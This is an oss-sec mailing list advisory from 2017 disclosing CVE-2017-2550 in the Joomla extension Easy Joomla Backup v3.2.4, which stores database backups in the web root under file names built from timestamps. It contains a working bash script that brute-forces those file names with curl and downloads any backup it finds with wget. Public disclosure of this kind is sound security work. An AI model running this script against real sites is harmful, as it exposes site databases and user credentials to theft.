oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

Joomla extension Easy Joomla Backup v3.2.4 database backup exposure

From: "Larry W. Cashdollar" <larry0 () me com>
Date: Thu, 28 Sep 2017 08:35:38 -0400
Title: Joomla extension Easy Joomla Backup v3.2.4 database backup exposure
Author: Larry W. Cashdollar, @_larry0
Date: 2017-09-07
CVE-ID:[CVE-2017-2550]
Download Site: https://joomla-extensions.kubik-rubik.de/ejb-easy-joomla-backup
Vendor: kubik-rubik
Vendor Notified: 2017-09-07
Vendor Contact:
Advisory: http://www.vapidlabs.com/advisory.php?v=200
Description: Easy Joomla Backup creates 'old-school' backups without any frills.
Vulnerability:
The software creates a copy of the backup in the web root.  The file name is easily guessable as it's just a time stamp:

http://example.com/administrator/components/com_easyjoomlabackup/backups/DOMAIN_YEAR-MONTH-DAY_H-M-S.zip

Exploit Code:
        • #!/bin/bash
        • #Larry W. Cashdollar, @_larry0 9/7/2017
        • #Bruteforce download backups for Joomla Extension Easy Joomla Backup v3.2.4
        • #https://joomla-extensions.kubik-rubik.de/ejb-easy-joomla-backup
        • MONTH=09
        • DAY=07
        • YEAR=2017
        • Z=0
        • #May need to set the DOMAIN to $1 the target depending on how WP is configured.
        • DOMAIN=192.168.0.163
        •  
        • echo "Scanning website for available backups:"
        • for y in `seq -w 0 23`; do
        •         for x in `seq -w 0 59`; do
        •                  Y=`echo "scale=2;($Z/86000)*100"|bc`;
        •                  echo -ne 
"\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CPATH
 $Y%"
        •         for z in `seq -w 0 59`; do
        •                  Z=$(( $Z + 1 ));
        •                  
CPATH="http://$1/administrator/components/com_easyjoomlabackup/backups/"$DOMAIN"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";;
        •                  RESULT=`curl -s --head $CPATH|grep 200`;
        •                 if [ -n "$RESULT" ]; then
        •                  echo ""
        •                  echo "[+] Location $CPATH Found";
        •                  echo "[+] Received $RESULT";
        •                  echo "Downloading......";
        •                  wget $CPATH
        •                 fi;
        •         done
        •         done
        • done
        • echo "Completed."
Previous By Date Next
Previous By Thread Next

Current thread: